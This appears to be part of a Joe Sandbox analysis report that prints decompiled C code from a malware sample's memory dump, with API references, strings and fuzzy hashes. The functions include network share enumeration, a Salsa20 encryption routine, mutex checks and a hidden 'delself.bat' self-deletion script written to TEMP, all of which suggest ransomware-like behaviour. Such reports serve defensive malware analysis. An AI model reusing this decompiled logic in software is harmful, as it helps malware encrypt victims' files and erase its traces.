				if( *_t45 != 0) {
					E00416D40(_t30,  *((intOrPtr*)(_t45 + 4)));
					L00422587( *_t45);
					_t53 = _a4;
				}
				 *_t45 = _t64;
				 *((intOrPtr*)(_t45 + 8)) = _t64 + (_t61 * 8 - _t61) * 4;
				_t36 = _t64 + (_t53 * 8 - _t53) * 4;
				 *((intOrPtr*)(_t45 + 4)) = _t36;
				 *[fs:0x0] = _v16;
				return _t36;
			}

0x00416573
0x00416575
0x00416580
0x00416581
0x00416588
0x0041658e
0x00416591
0x00416593
0x00416596
0x00416598
0x0041659d
0x0041659f
0x004165a5
0x004165c5
0x004165c5
0x004165a7
0x004165b4
0x004165b9
0x004165bb
0x004165be
0x004165c1
0x004165c3
0x00000000
0x00000000
0x004165c3
0x004165a5
0x004165ca
0x004165d1
0x004165dd
0x004165f1
0x004165fd
0x004165ff
0x00416604
0x0041660a
0x00416611
0x00416616
0x00416619
0x00416623
0x0041662b
0x0041663a
0x0041663d
0x00416641
0x0041664c

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004165C5

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID:
API String ID: 657562460-0
Opcode ID: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
Instruction ID: 5021f87c270b400a587bd724d9b61bde01bf534475f8b0cbfe068d44a909a5c2
Opcode Fuzzy Hash: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
Instruction Fuzzy Hash: A72124B5A00115DBCB14DF5CD981B9ABFA9EF45700F04822AEC058B348D738EA14CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00412840 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00412840(char* __ecx, void* __edx, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				intOrPtr _v28;
				char* _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t28;
				int _t37;
				int _t41;
				char* _t42;
				intOrPtr _t44;
				void* _t45;

				_push(0xffffffff);
				_push(E004CAC90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t44;
				_t45 = _t44 - 0x10;
				_t28 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_t37 =  !=  ? 0xfde9 : 0;
				_t41 = _a20 + 0x400;
				E00413C40(__ecx,  &_v32, _t37, _t41);
				_v8 = 1;
				_t42 = _v32;
				_t21 =  >=  ? _a4 :  &_a4;
				WideCharToMultiByte(_t37, 0,  >=  ? _a4 :  &_a4, 0xffffffff, _t42, _t41, 0, 0);
				 *((intOrPtr*)(_t28 + 0x14)) = 0xf;
				 *(_t28 + 0x10) = 0;
				 *_t28 = 0;
				_push(_a24);
				E004184E0(_t28, _t42, _v28); // executed
				if(_t42 != 0) {
					L00422587(_t42);
					_t45 = _t45 + 4;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t28;
			}

0x00412843
0x00412845
0x00412850
0x00412851
0x00412858
0x0041285e
0x00412860
0x00412869
0x0041287d
0x00412880
0x00412887
0x00412891
0x0041289c
0x0041289f
0x004128aa
0x004128b0
0x004128b9
0x004128c0
0x004128c3
0x004128ca
0x004128d1
0x004128d4
0x004128d9
0x004128d9
0x004128e0
0x004128e5
0x004128ea
0x004128f5
0x004128ff

APIs

Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004128AA

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_memset
String ID:
API String ID: 2800726579-0
Opcode ID: d4d73a905109635d96d8aebbdb5dfa8ea2b69a17998497c46c9ebcbc2b444938
Instruction ID: 77d5c0c78108e6bd7b696174a76f34ed3b4c8b07ae2fa23de187fb57fd92ed49
Opcode Fuzzy Hash: d4d73a905109635d96d8aebbdb5dfa8ea2b69a17998497c46c9ebcbc2b444938
Instruction Fuzzy Hash: 9B11D371A00219BBDB11DF59CD41BDFBBA8EF01714F10422AF914A72C0C7BD99558BDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA10 Relevance: 1.5, APIs: 1, Instructions: 19
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA10(DWORD* __ecx, void* _a4) {
				void* _t5;
				DWORD* _t10;

				_t10 = __ecx;
				_t5 = CreateThread(0, 0, E0041F130, _a4, 0, __ecx); // executed
				 *(_t10 + 4) = _t5;
				return 0 | _t5 != 0x00000000;
			}

0x0041fa14
0x0041fa25
0x0041fa2d
0x0041fa39

APIs

CreateThread.KERNEL32 ref: 0041FA25

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD80 Relevance: 1.5, APIs: 1, Instructions: 18
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FD80(void* __eflags, struct HWND__** _a4) {
				struct HWND__** _t10;

				_t10 = _a4;
				_t10[1] = 1;
				E00410BD0(0,  &(_t10[2])); // executed
				_t10[1] = 0;
				SendMessageW( *_t10, 0x8004, 0, 0); // executed
				return 0;
			}

0x0041fd84
0x0041fd8c
0x0041fd90
0x0041fda0
0x0041fda4
0x0041fdae

APIs

Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12

SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: EnumMessageOpenSend
String ID:
API String ID: 1835186980-0
Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDC0 Relevance: 1.5, APIs: 1, Instructions: 16
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDC0(void* _a4) {
				void* _t4;

				_t4 = CreateThread(0, 0, E0041FD80, _a4, 0, 0x529230); // executed
				 *0x529234 = _t4;
				return 0 | _t4 != 0x00000000;
			}

0x0041fdd6
0x0041fdde
0x0041fdeb

APIs

CreateThread.KERNEL32 ref: 0041FDD6

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004220B6 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004220B6(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t11;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00421FF2(_t4, _t5, _t6, _t7, _t8, _t11); // executed
				return _t3;
			}

0x004220b9
0x004220bb
0x004220be
0x004220c1
0x004220ca

APIs

__fsopen.LIBCMT ref: 004220C1

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9

Uniqueness

Uniqueness Score: -1.00%

Function 00420FDD Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00420FDD(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00421037(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}

0x00420fe0
0x00420fe2
0x00420fe5
0x00420fe8
0x00420ff1

APIs

__wfsopen.LIBCMT ref: 00420FE8

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

OCP, xrefs: 004382C4
ACP, xrefs: 004382B3

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

delself.bat, xrefs: 0041261C
@echo off:trydel ", xrefs: 0041262A
TEMP, xrefs: 004125DF
D, xrefs: 00412720
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
" goto try, xrefs: 00412666
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
del ", xrefs: 00412674
"if exist ", xrefs: 00412648

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
